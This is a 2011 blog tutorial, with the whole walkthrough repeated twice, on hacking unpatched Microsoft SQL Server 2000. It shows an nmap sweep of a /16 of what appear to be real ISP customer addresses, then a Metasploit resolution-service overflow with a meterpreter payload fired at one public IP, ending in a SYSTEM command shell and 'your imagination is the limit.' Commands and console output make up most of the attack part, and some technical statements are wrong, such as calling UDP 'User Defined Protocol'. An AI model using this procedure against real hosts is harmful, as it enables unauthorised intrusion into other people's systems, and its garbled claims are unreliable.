- Back to Home »
- Tricks And Tutorials »
- MSSQL Exploit
Wednesday, March 16, 2011
The following exploit is for Microsoft SQL Server.
Requirements
Metasploit framework
NMap
Microsoft SQL Server listens on port 1433 and port 1434. Port 1433 is a TCP (Transmission Control Protocol) port. While 1434 is a UDP (User Defined Protocol) port. For NMap we will be using a SYN Scan a SYN scan is pretty much like playing ding dong ditch. A regular protocol requires a three way hand shake. A SYN scan initiates the hand shake waits for a reply then leaves. Metasploit we will be using the exploit MSSQL 2000/MSDE Resolution Overflow. “This is an exploit for the SQL Server 2000 resolution service buffer overflow. This overflow is triggered by sending a udp packet to port 1434 which starts with 0x04 and is followed by long string terminating with a colon and a number. This module should work against any vulnerable SQL Server 2000 or MSDE install (pre-SP3).”
First step is to find a vulnerable host to do this we will be looking for a host that has port 1434 open. When I scan hosts with NMap I always give it a range for I have a better chance of getting a hit. I also have the command output the results to a file for I have them on record and they are easier to search.
#nmap –sU –p1434 –P0 –sS 24.151.0.0/16 >>/home/user/1434.txt
-sU UDP scan
-p What port to scan in this case 1434
-P0 Don’t ping host first
-sS SYN scan this is for TCP but I’m in the habit of always using it
IP The IP address 24.151.0.0
/ Subnet suffix in this case 16=255.255.0.0
>> Where the output file is going to be located
The scan is going to take a while we are scanning 65,025 hosts. When the scan is done or 30min feel free to start searching the output file for anything that says open.
Interesting ports on 24-151-73-076.dhcp.nwtn.ct.charter.com (24.151.73.76):
PORT STATE SERVICE
1434/udp open ms-sql-s
So now that we found a potential box for attack we try to hack it. I will be using Metasploit 2 console for this attack, Metasploit 3, gui and web interface will all work as well.
#msfconsole
[*] Starting the Metasploit Framework...
+ -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]
msf >use mssql2000_resolution
msf mssql2000_resolution >set PAYLOAD win32_reverse_meterpreter
PAYLOAD -> win32_bind_meterpreter
msf mssql2000_resolution(win32_bind_meterpreter) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ ------- ------------------
required RHOST The target address
required RPORT 1434 The target port
Payload: Name Default Description
-------- -------- ------------------------------------------- ----------------------
--------------------
required EXITFUNC process Exit technique: "proce
ss", "thread", "seh"
required METDLL /home/framework/data/meterpreter/metsrv.dll The full path the mete
rpreter server dll
required LPORT 4444 Listening port for bin
d shell
Target: MSQL 2000 / MSDE
msf mssql2000_resolution(win32_bind_meterpreter) >
msf mssql2000_resolution(win32_bind_meterpreter) > set RHOST 24.151.73.76
RHOST -> 24.151.73.76
msf mssql2000_resolution(win32_bind_meterpreter) > set LHOST 10.10.10.197
LHOST -> 10.10.10.197
msf mssql2000_resolution(win32_bind_meterpreter) > exploit
[*] Starting Bind Handler.
[*] Trying target MSQL 2000 / MSDE with return address 0x42b48774
[*] Execute 'net start sqlserveragent' once access is obtained
[*] Got connection from 10.10.10.197:2199 <-> 24.89.130.146:4444
[*] Sending Intermediate Stager (89 bytes)
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed
meterpreter> use –m Process
loadlib: Loading library from ‘ext227496.dll’ on the remote machine
meterpreter>
loadlib: success.
meterpreter> execute –f cmd –c
execute: Executing ‘cmd’…
meterpreter>
execute: success, process id is 1576
execute: allocated channel 1 for new process.
meterpreter> interact 1
interact: Switching to interactive console on 1…
meterpreter>
interact: Starter interactive channel 1.
Microsfor Windows 2000 {Version 5.00.2195
© Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>
When you get to the shell you can do a whoami and you will see that you are logged in as NT AUTHORITY\SYSTEM, that means you have Administrator rights. Now your imagination is the limit.
Requirements
Metasploit framework
NMap
Microsoft SQL Server listens on port 1433 and port 1434. Port 1433 is a TCP (Transmission Control Protocol) port. While 1434 is a UDP (User Defined Protocol) port. For NMap we will be using a SYN Scan a SYN scan is pretty much like playing ding dong ditch. A regular protocol requires a three way hand shake. A SYN scan initiates the hand shake waits for a reply then leaves. Metasploit we will be using the exploit MSSQL 2000/MSDE Resolution Overflow. “This is an exploit for the SQL Server 2000 resolution service buffer overflow. This overflow is triggered by sending a udp packet to port 1434 which starts with 0x04 and is followed by long string terminating with a colon and a number. This module should work against any vulnerable SQL Server 2000 or MSDE install (pre-SP3).”
First step is to find a vulnerable host to do this we will be looking for a host that has port 1434 open. When I scan hosts with NMap I always give it a range for I have a better chance of getting a hit. I also have the command output the results to a file for I have them on record and they are easier to search.
#nmap –sU –p1434 –P0 –sS 24.151.0.0/16 >>/home/user/1434.txt
-sU UDP scan
-p What port to scan in this case 1434
-P0 Don’t ping host first
-sS SYN scan this is for TCP but I’m in the habit of always using it
IP The IP address 24.151.0.0
/ Subnet suffix in this case 16=255.255.0.0
>> Where the output file is going to be located
The scan is going to take a while we are scanning 65,025 hosts. When the scan is done or 30min feel free to start searching the output file for anything that says open.
Interesting ports on 24-151-73-076.dhcp.nwtn.ct.charter.com (24.151.73.76):
PORT STATE SERVICE
1434/udp open ms-sql-s
So now that we found a potential box for attack we try to hack it. I will be using Metasploit 2 console for this attack, Metasploit 3, gui and web interface will all work as well.
#msfconsole
[*] Starting the Metasploit Framework...
+ -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]
msf >use mssql2000_resolution
msf mssql2000_resolution >set PAYLOAD win32_reverse_meterpreter
PAYLOAD -> win32_bind_meterpreter
msf mssql2000_resolution(win32_bind_meterpreter) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ ------- ------------------
required RHOST The target address
required RPORT 1434 The target port
Payload: Name Default Description
-------- -------- ------------------------------------------- ----------------------
--------------------
required EXITFUNC process Exit technique: "proce
ss", "thread", "seh"
required METDLL /home/framework/data/meterpreter/metsrv.dll The full path the mete
rpreter server dll
required LPORT 4444 Listening port for bin
d shell
Target: MSQL 2000 / MSDE
msf mssql2000_resolution(win32_bind_meterpreter) >
msf mssql2000_resolution(win32_bind_meterpreter) > set RHOST 24.151.73.76
RHOST -> 24.151.73.76
msf mssql2000_resolution(win32_bind_meterpreter) > set LHOST 10.10.10.197
LHOST -> 10.10.10.197
msf mssql2000_resolution(win32_bind_meterpreter) > exploit
[*] Starting Bind Handler.
[*] Trying target MSQL 2000 / MSDE with return address 0x42b48774
[*] Execute 'net start sqlserveragent' once access is obtained
[*] Got connection from 10.10.10.197:2199 <-> 24.89.130.146:4444
[*] Sending Intermediate Stager (89 bytes)
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed
meterpreter> use –m Process
loadlib: Loading library from ‘ext227496.dll’ on the remote machine
meterpreter>
loadlib: success.
meterpreter> execute –f cmd –c
execute: Executing ‘cmd’…
meterpreter>
execute: success, process id is 1576
execute: allocated channel 1 for new process.
meterpreter> interact 1
interact: Switching to interactive console on 1…
meterpreter>
interact: Starter interactive channel 1.
Microsfor Windows 2000 {Version 5.00.2195
© Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>
When you get to the shell you can do a whoami and you will see that you are logged in as NT AUTHORITY\SYSTEM, that means you have Administrator rights. Now your imagination is the limit.
i want 2 learn,but what is the use of hash?
ReplyDeletecrack?
ReplyDelete